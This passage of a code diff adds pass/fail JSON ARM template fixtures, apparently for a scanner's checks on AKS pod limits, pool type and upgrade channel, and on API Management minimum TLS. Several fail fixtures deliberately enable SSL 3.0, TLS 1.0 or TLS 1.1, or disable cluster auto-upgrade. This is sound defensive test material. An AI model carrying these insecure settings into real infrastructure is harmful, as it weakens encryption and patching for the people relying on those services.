+                "maxPods": 33,
+                "type": "VirtualMachineScaleSets",
+                "orchestratorVersion": "[parameters('kubernetesVersion')]",
+                "mode": "System",
+                "osType": "Linux"
+            }
+        }
+
+
+  ],
+  "outputs": {
+    "controlPlaneFQDN": {
+      "type": "string",
+      "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('aksClusterName'))).fqdn]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_AKSMaxPodsMinimum/properties_with_maxPods_pass1.json b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/properties_with_maxPods_pass1.json
new file mode 100644
index 00000000000..2207d1c9eb7
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/properties_with_maxPods_pass1.json
@@ -0,0 +1,96 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.5.6.12127",
+      "templateHash": "12705365244308198684"
+    }
+  },
+  "parameters": {
+    "aksClusterName": {
+      "type": "string",
+      "defaultValue": "aks101cluster-vmss",
+      "metadata": {
+        "description": "The name of the Managed Cluster resource."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The location of AKS resource."
+      }
+    },
+    "dnsPrefix": {
+      "type": "string",
+      "metadata": {
+        "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN."
+      }
+    },
+    "osDiskSizeGB": {
+      "type": "int",
+      "defaultValue": 0,
+      "maxValue": 1023,
+      "minValue": 0,
+      "metadata": {
+        "description": "Disk size (in GiB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize."
+      }
+    },
+    "agentCount": {
+      "type": "int",
+      "defaultValue": 3,
+      "maxValue": 100,
+      "minValue": 1,
+      "metadata": {
+        "description": "The number of nodes for the cluster. 1 Node is enough for Dev/Test and minimum 3 nodes, is recommended for Production"
+      }
+    },
+    "agentVMSize": {
+      "type": "string",
+      "defaultValue": "Standard_D2s_v3",
+      "metadata": {
+        "description": "The size of the Virtual Machine."
+      }
+    },
+    "osType": {
+      "type": "string",
+      "defaultValue": "Linux",
+      "allowedValues": [
+        "Linux",
+        "Windows"
+      ],
+      "metadata": {
+        "description": "The type of operating system."
+      }
+    }
+  },
+  "resources": [
+    {
+            "type": "Microsoft.ContainerService/managedClusters/agentPools",
+            "apiVersion": "2020-03-01",
+            "name": "properties_with_maxPods_pass1",
+            "dependsOn": [
+                "[resourceId('Microsoft.ContainerService/managedClusters', parameters('clusterName'))]"
+            ],
+            "properties": {
+                "count": "[parameters('agentCount')]",
+                "vmSize": "[parameters('agentVMSize')]",
+                "osDiskSizeGB": "[parameters('osDiskSizeGB')]",
+                "type": "VirtualMachineScaleSets",
+                "orchestratorVersion": "[parameters('kubernetesVersion')]",
+                "mode": "System",
+                "osType": "Linux",
+                "maxPods": 51
+            }
+        }
+
+  ],
+  "outputs": {
+    "controlPlaneFQDN": {
+      "type": "string",
+      "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('aksClusterName'))).fqdn]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_AKSMaxPodsMinimum/properties_without_maxPods_fail.json b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/properties_without_maxPods_fail.json
new file mode 100644
index 00000000000..89da889c457
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/properties_without_maxPods_fail.json
@@ -0,0 +1,96 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.5.6.12127",
+      "templateHash": "12705365244308198684"
+    }
+  },
+  "parameters": {
+    "aksClusterName": {
+      "type": "string",
+      "defaultValue": "aks101cluster-vmss",
+      "metadata": {
+        "description": "The name of the Managed Cluster resource."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The location of AKS resource."
+      }
+    },
+    "dnsPrefix": {
+      "type": "string",
+      "metadata": {
+        "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN."
+      }
+    },
+    "osDiskSizeGB": {
+      "type": "int",
+      "defaultValue": 0,
+      "maxValue": 1023,
+      "minValue": 0,
+      "metadata": {
+        "description": "Disk size (in GiB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize."
+      }
+    },
+    "agentCount": {
+      "type": "int",
+      "defaultValue": 3,
+      "maxValue": 100,
+      "minValue": 1,
+      "metadata": {
+        "description": "The number of nodes for the cluster. 1 Node is enough for Dev/Test and minimum 3 nodes, is recommended for Production"
+      }
+    },
+    "agentVMSize": {
+      "type": "string",
+      "defaultValue": "Standard_D2s_v3",
+      "metadata": {
+        "description": "The size of the Virtual Machine."
+      }
+    },
+    "osType": {
+      "type": "string",
+      "defaultValue": "Linux",
+      "allowedValues": [
+        "Linux",
+        "Windows"
+      ],
+      "metadata": {
+        "description": "The type of operating system."
+      }
+    }
+  },
+  "resources": [
+        {
+            "type": "Microsoft.ContainerService/managedClusters/agentPools",
+            "apiVersion": "2020-03-01",
+            "name": "properties_without_maxPods_fail",
+            "dependsOn": [
+                "[resourceId('Microsoft.ContainerService/managedClusters', parameters('clusterName'))]"
+            ],
+            "properties": {
+                "count": "[parameters('agentCount')]",
+                "vmSize": "[parameters('agentVMSize')]",
+                "osDiskSizeGB": "[parameters('osDiskSizeGB')]",
+                "type": "VirtualMachineScaleSets",
+                "orchestratorVersion": "[parameters('kubernetesVersion')]",
+                "mode": "System",
+                "osType": "Linux"
+            }
+        }
+
+
+  ],
+  "outputs": {
+    "controlPlaneFQDN": {
+      "type": "string",
+      "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('aksClusterName'))).fqdn]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_AKSPoolTypeIsScaleSet/fail.json b/tests/arm/checks/resource/example_AKSPoolTypeIsScaleSet/fail.json
new file mode 100644
index 00000000000..4e6c879eef1
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSPoolTypeIsScaleSet/fail.json
@@ -0,0 +1,111 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.26.170.59819",
+      "templateHash": "14823542069333410776"
+    }
+  },
+  "parameters": {
+    "clusterName": {
+      "type": "string",
+      "defaultValue": "aks101cluster",
+      "metadata": {
+        "description": "The name of the Managed Cluster resource."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The location of the Managed Cluster resource."
+      }
+    },
+    "dnsPrefix": {
+      "type": "string",
+      "metadata": {
+        "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN."
+      }
+    },
+    "osDiskSizeGB": {
+      "type": "int",
+      "defaultValue": 0,
+      "minValue": 0,
+      "maxValue": 1023,
+      "metadata": {
+        "description": "Disk size (in GB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize."
+      }
+    },
+    "agentCount": {
+      "type": "int",
+      "defaultValue": 3,
+      "minValue": 1,
+      "maxValue": 50,
+      "metadata": {
+        "description": "The number of nodes for the cluster."
+      }
+    },
+    "agentVMSize": {
+      "type": "string",
+      "defaultValue": "standard_d2s_v3",
+      "metadata": {
+        "description": "The size of the Virtual Machine."
+      }
+    },
+    "linuxAdminUsername": {
+      "type": "string",
+      "metadata": {
+        "description": "User name for the Linux Virtual Machines."
+      }
+    },
+    "sshRSAPublicKey": {
+      "type": "string",
+      "metadata": {
+        "description": "Configure all linux machines with the SSH RSA public key string. Your key should include three parts, for example 'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm'"
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.ContainerService/managedClusters",
+      "apiVersion": "2024-02-01",
+      "name": "fail",
+      "location": "[parameters('location')]",
+      "identity": {
+        "type": "SystemAssigned"
+      },
+      "properties": {
+        "dnsPrefix": "[parameters('dnsPrefix')]",
+        "agentPoolProfiles": [
+          {
+            "name": "agentpool",
+            "osDiskSizeGB": "[parameters('osDiskSizeGB')]",
+            "count": "[parameters('agentCount')]",
+            "type": "AvailabilitySet",
+            "vmSize": "[parameters('agentVMSize')]",
+            "osType": "Linux",
+            "mode": "System"
+          }
+        ],
+        "linuxProfile": {
+          "adminUsername": "[parameters('linuxAdminUsername')]",
+          "ssh": {
+            "publicKeys": [
+              {
+                "keyData": "[parameters('sshRSAPublicKey')]"
+              }
+            ]
+          }
+        }
+      }
+    }
+  ],
+  "outputs": {
+    "controlPlaneFQDN": {
+      "type": "string",
+      "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('clusterName')), '2024-02-01').fqdn]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_AKSPoolTypeIsScaleSet/pass.json b/tests/arm/checks/resource/example_AKSPoolTypeIsScaleSet/pass.json
new file mode 100644
index 00000000000..6a3c5f27348
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSPoolTypeIsScaleSet/pass.json
@@ -0,0 +1,111 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.26.170.59819",
+      "templateHash": "14823542069333410776"
+    }
+  },
+  "parameters": {
+    "clusterName": {
+      "type": "string",
+      "defaultValue": "aks101cluster",
+      "metadata": {
+        "description": "The name of the Managed Cluster resource."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The location of the Managed Cluster resource."
+      }
+    },
+    "dnsPrefix": {
+      "type": "string",
+      "metadata": {
+        "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN."
+      }
+    },
+    "osDiskSizeGB": {
+      "type": "int",
+      "defaultValue": 0,
+      "minValue": 0,
+      "maxValue": 1023,
+      "metadata": {
+        "description": "Disk size (in GB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize."
+      }
+    },
+    "agentCount": {
+      "type": "int",
+      "defaultValue": 3,
+      "minValue": 1,
+      "maxValue": 50,
+      "metadata": {
+        "description": "The number of nodes for the cluster."
+      }
+    },
+    "agentVMSize": {
+      "type": "string",
+      "defaultValue": "standard_d2s_v3",
+      "metadata": {
+        "description": "The size of the Virtual Machine."
+      }
+    },
+    "linuxAdminUsername": {
+      "type": "string",
+      "metadata": {
+        "description": "User name for the Linux Virtual Machines."
+      }
+    },
+    "sshRSAPublicKey": {
+      "type": "string",
+      "metadata": {
+        "description": "Configure all linux machines with the SSH RSA public key string. Your key should include three parts, for example 'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm'"
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.ContainerService/managedClusters",
+      "apiVersion": "2024-02-01",
+      "name": "pass",
+      "location": "[parameters('location')]",
+      "identity": {
+        "type": "SystemAssigned"
+      },
+      "properties": {
+        "dnsPrefix": "[parameters('dnsPrefix')]",
+        "agentPoolProfiles": [
+          {
+            "name": "agentpool",
+            "osDiskSizeGB": "[parameters('osDiskSizeGB')]",
+            "count": "[parameters('agentCount')]",
+            "type": "VirtualMachineScaleSets",
+            "vmSize": "[parameters('agentVMSize')]",
+            "osType": "Linux",
+            "mode": "System"
+          }
+        ],
+        "linuxProfile": {
+          "adminUsername": "[parameters('linuxAdminUsername')]",
+          "ssh": {
+            "publicKeys": [
+              {
+                "keyData": "[parameters('sshRSAPublicKey')]"
+              }
+            ]
+          }
+        }
+      }
+    }
+  ],
+  "outputs": {
+    "controlPlaneFQDN": {
+      "type": "string",
+      "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('clusterName')), '2024-02-01').fqdn]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_AKSPoolTypeIsScaleSet/pass1.json b/tests/arm/checks/resource/example_AKSPoolTypeIsScaleSet/pass1.json
new file mode 100644
index 00000000000..df3b7b148d4
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSPoolTypeIsScaleSet/pass1.json
@@ -0,0 +1,110 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.26.170.59819",
+      "templateHash": "14823542069333410776"
+    }
+  },
+  "parameters": {
+    "clusterName": {
+      "type": "string",
+      "defaultValue": "aks101cluster",
+      "metadata": {
+        "description": "The name of the Managed Cluster resource."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The location of the Managed Cluster resource."
+      }
+    },
+    "dnsPrefix": {
+      "type": "string",
+      "metadata": {
+        "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN."
+      }
+    },
+    "osDiskSizeGB": {
+      "type": "int",
+      "defaultValue": 0,
+      "minValue": 0,
+      "maxValue": 1023,
+      "metadata": {
+        "description": "Disk size (in GB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize."
+      }
+    },
+    "agentCount": {
+      "type": "int",
+      "defaultValue": 3,
+      "minValue": 1,
+      "maxValue": 50,
+      "metadata": {
+        "description": "The number of nodes for the cluster."
+      }
+    },
+    "agentVMSize": {
+      "type": "string",
+      "defaultValue": "standard_d2s_v3",
+      "metadata": {
+        "description": "The size of the Virtual Machine."
+      }
+    },
+    "linuxAdminUsername": {
+      "type": "string",
+      "metadata": {
+        "description": "User name for the Linux Virtual Machines."
+      }
+    },
+    "sshRSAPublicKey": {
+      "type": "string",
+      "metadata": {
+        "description": "Configure all linux machines with the SSH RSA public key string. Your key should include three parts, for example 'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm'"
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.ContainerService/managedClusters",
+      "apiVersion": "2024-02-01",
+      "name": "pass1",
+      "location": "[parameters('location')]",
+      "identity": {
+        "type": "SystemAssigned"
+      },
+      "properties": {
+        "dnsPrefix": "[parameters('dnsPrefix')]",
+        "agentPoolProfiles": [
+          {
+            "name": "agentpool",
+            "osDiskSizeGB": "[parameters('osDiskSizeGB')]",
+            "count": "[parameters('agentCount')]",
+            "vmSize": "[parameters('agentVMSize')]",
+            "osType": "Linux",
+            "mode": "System"
+          }
+        ],
+        "linuxProfile": {
+          "adminUsername": "[parameters('linuxAdminUsername')]",
+          "ssh": {
+            "publicKeys": [
+              {
+                "keyData": "[parameters('sshRSAPublicKey')]"
+              }
+            ]
+          }
+        }
+      }
+    }
+  ],
+  "outputs": {
+    "controlPlaneFQDN": {
+      "type": "string",
+      "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('clusterName')), '2024-02-01').fqdn]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_AKSUpgradeChannel/fail.json b/tests/arm/checks/resource/example_AKSUpgradeChannel/fail.json
new file mode 100644
index 00000000000..f1605df5665
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSUpgradeChannel/fail.json
@@ -0,0 +1,107 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.5.6.12127",
+      "templateHash": "12705365244308198684"
+    }
+  },
+  "parameters": {
+    "aksClusterName": {
+      "type": "string",
+      "defaultValue": "aks101cluster-vmss",
+      "metadata": {
+        "description": "The name of the Managed Cluster resource."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The location of AKS resource."
+      }
+    },
+    "dnsPrefix": {
+      "type": "string",
+      "metadata": {
+        "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN."
+      }
+    },
+    "osDiskSizeGB": {
+      "type": "int",
+      "defaultValue": 0,
+      "maxValue": 1023,
+      "minValue": 0,
+      "metadata": {
+        "description": "Disk size (in GiB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize."
+      }
+    },
+    "agentCount": {
+      "type": "int",
+      "defaultValue": 3,
+      "maxValue": 100,
+      "minValue": 1,
+      "metadata": {
+        "description": "The number of nodes for the cluster. 1 Node is enough for Dev/Test and minimum 3 nodes, is recommended for Production"
+      }
+    },
+    "agentVMSize": {
+      "type": "string",
+      "defaultValue": "Standard_D2s_v3",
+      "metadata": {
+        "description": "The size of the Virtual Machine."
+      }
+    },
+    "osType": {
+      "type": "string",
+      "defaultValue": "Linux",
+      "allowedValues": [
+        "Linux",
+        "Windows"
+      ],
+      "metadata": {
+        "description": "The type of operating system."
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.ContainerService/managedClusters",
+      "apiVersion": "2022-01-02-preview",
+      "name": "fail",
+      "location": "[parameters('location')]",
+      "tags": {
+        "displayname": "AKS Cluster"
+      },
+      "identity": {
+        "type": "SystemAssigned"
+      },
+      "properties": {
+        "enableRBAC": true,
+        "dnsPrefix": "[parameters('dnsPrefix')]",
+        "autoUpgradeProfile": {
+          "upgradeChannel": "none"
+    },
+        "agentPoolProfiles": [
+          {
+            "name": "agentpool",
+            "osDiskSizeGB": "[parameters('osDiskSizeGB')]",
+            "count": "[parameters('agentCount')]",
+            "vmSize": "[parameters('agentVMSize')]",
+            "osType": "[parameters('osType')]",
+            "type": "VirtualMachineScaleSets",
+            "mode": "System"
+          }
+        ]
+      }
+    }
+  ],
+  "outputs": {
+    "controlPlaneFQDN": {
+      "type": "string",
+      "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('aksClusterName'))).fqdn]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_AKSUpgradeChannel/fail1.json b/tests/arm/checks/resource/example_AKSUpgradeChannel/fail1.json
new file mode 100644
index 00000000000..129713d935e
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSUpgradeChannel/fail1.json
@@ -0,0 +1,104 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.5.6.12127",
+      "templateHash": "12705365244308198684"
+    }
+  },
+  "parameters": {
+    "aksClusterName": {
+      "type": "string",
+      "defaultValue": "aks101cluster-vmss",
+      "metadata": {
+        "description": "The name of the Managed Cluster resource."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The location of AKS resource."
+      }
+    },
+    "dnsPrefix": {
+      "type": "string",
+      "metadata": {
+        "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN."
+      }
+    },
+    "osDiskSizeGB": {
+      "type": "int",
+      "defaultValue": 0,
+      "maxValue": 1023,
+      "minValue": 0,
+      "metadata": {
+        "description": "Disk size (in GiB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize."
+      }
+    },
+    "agentCount": {
+      "type": "int",
+      "defaultValue": 3,
+      "maxValue": 100,
+      "minValue": 1,
+      "metadata": {
+        "description": "The number of nodes for the cluster. 1 Node is enough for Dev/Test and minimum 3 nodes, is recommended for Production"
+      }
+    },
+    "agentVMSize": {
+      "type": "string",
+      "defaultValue": "Standard_D2s_v3",
+      "metadata": {
+        "description": "The size of the Virtual Machine."
+      }
+    },
+    "osType": {
+      "type": "string",
+      "defaultValue": "Linux",
+      "allowedValues": [
+        "Linux",
+        "Windows"
+      ],
+      "metadata": {
+        "description": "The type of operating system."
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.ContainerService/managedClusters",
+      "apiVersion": "2022-01-02-preview",
+      "name": "fail1",
+      "location": "[parameters('location')]",
+      "tags": {
+        "displayname": "AKS Cluster"
+      },
+      "identity": {
+        "type": "SystemAssigned"
+      },
+      "properties": {
+        "enableRBAC": true,
+        "dnsPrefix": "[parameters('dnsPrefix')]",
+        "agentPoolProfiles": [
+          {
+            "name": "agentpool",
+            "osDiskSizeGB": "[parameters('osDiskSizeGB')]",
+            "count": "[parameters('agentCount')]",
+            "vmSize": "[parameters('agentVMSize')]",
+            "osType": "[parameters('osType')]",
+            "type": "VirtualMachineScaleSets",
+            "mode": "System"
+          }
+        ]
+      }
+    }
+  ],
+  "outputs": {
+    "controlPlaneFQDN": {
+      "type": "string",
+      "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('aksClusterName'))).fqdn]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_AKSUpgradeChannel/pass.json b/tests/arm/checks/resource/example_AKSUpgradeChannel/pass.json
new file mode 100644
index 00000000000..1bf35f9b808
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSUpgradeChannel/pass.json
@@ -0,0 +1,107 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.5.6.12127",
+      "templateHash": "12705365244308198684"
+    }
+  },
+  "parameters": {
+    "aksClusterName": {
+      "type": "string",
+      "defaultValue": "aks101cluster-vmss",
+      "metadata": {
+        "description": "The name of the Managed Cluster resource."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The location of AKS resource."
+      }
+    },
+    "dnsPrefix": {
+      "type": "string",
+      "metadata": {
+        "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN."
+      }
+    },
+    "osDiskSizeGB": {
+      "type": "int",
+      "defaultValue": 0,
+      "maxValue": 1023,
+      "minValue": 0,
+      "metadata": {
+        "description": "Disk size (in GiB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize."
+      }
+    },
+    "agentCount": {
+      "type": "int",
+      "defaultValue": 3,
+      "maxValue": 100,
+      "minValue": 1,
+      "metadata": {
+        "description": "The number of nodes for the cluster. 1 Node is enough for Dev/Test and minimum 3 nodes, is recommended for Production"
+      }
+    },
+    "agentVMSize": {
+      "type": "string",
+      "defaultValue": "Standard_D2s_v3",
+      "metadata": {
+        "description": "The size of the Virtual Machine."
+      }
+    },
+    "osType": {
+      "type": "string",
+      "defaultValue": "Linux",
+      "allowedValues": [
+        "Linux",
+        "Windows"
+      ],
+      "metadata": {
+        "description": "The type of operating system."
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.ContainerService/managedClusters",
+      "apiVersion": "2022-01-02-preview",
+      "name": "pass",
+      "location": "[parameters('location')]",
+      "tags": {
+        "displayname": "AKS Cluster"
+      },
+      "identity": {
+        "type": "SystemAssigned"
+      },
+      "properties": {
+        "enableRBAC": true,
+        "dnsPrefix": "[parameters('dnsPrefix')]",
+        "autoUpgradeProfile": {
+          "upgradeChannel": "stable"
+    },
+        "agentPoolProfiles": [
+          {
+            "name": "agentpool",
+            "osDiskSizeGB": "[parameters('osDiskSizeGB')]",
+            "count": "[parameters('agentCount')]",
+            "vmSize": "[parameters('agentVMSize')]",
+            "osType": "[parameters('osType')]",
+            "type": "VirtualMachineScaleSets",
+            "mode": "System"
+          }
+        ]
+      }
+    }
+  ],
+  "outputs": {
+    "controlPlaneFQDN": {
+      "type": "string",
+      "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('aksClusterName'))).fqdn]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_APIManagementMinTLS12/fail.json b/tests/arm/checks/resource/example_APIManagementMinTLS12/fail.json
new file mode 100644
index 00000000000..ee715726b3b
--- /dev/null
+++ b/tests/arm/checks/resource/example_APIManagementMinTLS12/fail.json
@@ -0,0 +1,149 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.26.54.24096",
+      "templateHash": "15176578550391235821"
+    }
+  },
+  "parameters": {
+    "publisherEmail": {
+      "type": "string",
+      "minLength": 1,
+      "metadata": {
+        "description": "The email address of the owner of the service"
+      }
+    },
+    "publisherName": {
+      "type": "string",
+      "minLength": 1,
+      "metadata": {
+        "description": "The name of the owner of the service"
+      }
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "Developer",
+      "allowedValues": [
+        "Consumption",
+        "Developer",
+        "Basic",
+        "Basicv2",
+        "Standard",
+        "Standardv2",
+        "Premium"
+      ],
+      "metadata": {
+        "description": "The pricing tier of this API Management service"
+      }
+    },
+    "skuCount": {
+      "type": "int",
+      "defaultValue": 1,
+      "allowedValues": [
+        0,
+        1,
+        2
+      ],
+      "metadata": {
+        "description": "The instance size of this API Management service."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.ApiManagement/service",
+      "apiVersion":"2023-05-01-preview",
+      "name": "fail",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('sku')]",
+        "capacity": "[parameters('skuCount')]"
+      },
+      "properties": {
+        "publisherEmail": "[parameters('publisherEmail')]",
+        "publisherName": "[parameters('publisherName')]",
+        "customProperties":{
+          "Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Backend.Protocols.Ssl30": true
+        }
+      }
+    },
+     {
+      "type": "Microsoft.ApiManagement/service",
+      "apiVersion": "2023-05-01-preview",
+      "name": "fail2",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('sku')]",
+        "capacity": "[parameters('skuCount')]"
+      },
+      "properties": {
+        "publisherEmail": "[parameters('publisherEmail')]",
+        "publisherName": "[parameters('publisherName')]",
+        "customProperties":{
+          "Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Backend.Protocols.Tls10": true
+        }
+      }
+    },
+    {
+      "type": "Microsoft.ApiManagement/service",
+      "apiVersion": "2023-05-01-preview",
+      "name": "fail3",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('sku')]",
+        "capacity": "[parameters('skuCount')]"
+      },
+      "properties": {
+        "publisherEmail": "[parameters('publisherEmail')]",
+        "publisherName": "[parameters('publisherName')]",
+        "customProperties":{
+          "Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Protocols.Ssl30": true
+        }
+      }
+    },
+     {
+      "type": "Microsoft.ApiManagement/service",
+      "apiVersion": "2023-05-01-preview",
+      "name": "fail4",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('sku')]",
+        "capacity": "[parameters('skuCount')]"
+      },
+      "properties": {
+        "publisherEmail": "[parameters('publisherEmail')]",
+        "publisherName": "[parameters('publisherName')]",
+        "customProperties":{
+          "Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Protocols.Tls10": true
+        }
+      }
+    },
+     {
+      "type": "Microsoft.ApiManagement/service",
+      "apiVersion": "2023-05-01-preview",
+      "name": "fail5",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('sku')]",
+        "capacity": "[parameters('skuCount')]"
+      },
+      "properties": {
+        "publisherEmail": "[parameters('publisherEmail')]",
+        "publisherName": "[parameters('publisherName')]",
+        "customProperties":{
+          "Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Protocols.Tls11": true
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_APIManagementMinTLS12/pass.json b/tests/arm/checks/resource/example_APIManagementMinTLS12/pass.json
new file mode 100644
index 00000000000..7df9a815b6a
--- /dev/null
+++ b/tests/arm/checks/resource/example_APIManagementMinTLS12/pass.json
@@ -0,0 +1,78 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.26.54.24096",
+      "templateHash": "15176578550391235821"
+    }
+  },
+  "parameters": {
+    "publisherEmail": {
+      "type": "string",
+      "minLength": 1,
+      "metadata": {
+        "description": "The email address of the owner of the service"
+      }
+    },
+    "publisherName": {
+      "type": "string",
+      "minLength": 1,
+      "metadata": {
+        "description": "The name of the owner of the service"
+      }
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "Developer",
+      "allowedValues": [
+        "Consumption",
+        "Developer",
+        "Basic",
+        "Basicv2",
+        "Standard",
+        "Standardv2",
+        "Premium"
+      ],
+      "metadata": {
+        "description": "The pricing tier of this API Management service"
+      }
+    },
+    "skuCount": {
+      "type": "int",
+      "defaultValue": 1,
+      "allowedValues": [
+        0,
+        1,
+        2
+      ],
+      "metadata": {
+        "description": "The instance size of this API Management service."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.ApiManagement/service",
+      "apiVersion": "2023-05-01-preview",
+      "name": "pass",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('sku')]",
+        "capacity": "[parameters('skuCount')]"
+      },
+      "properties": {
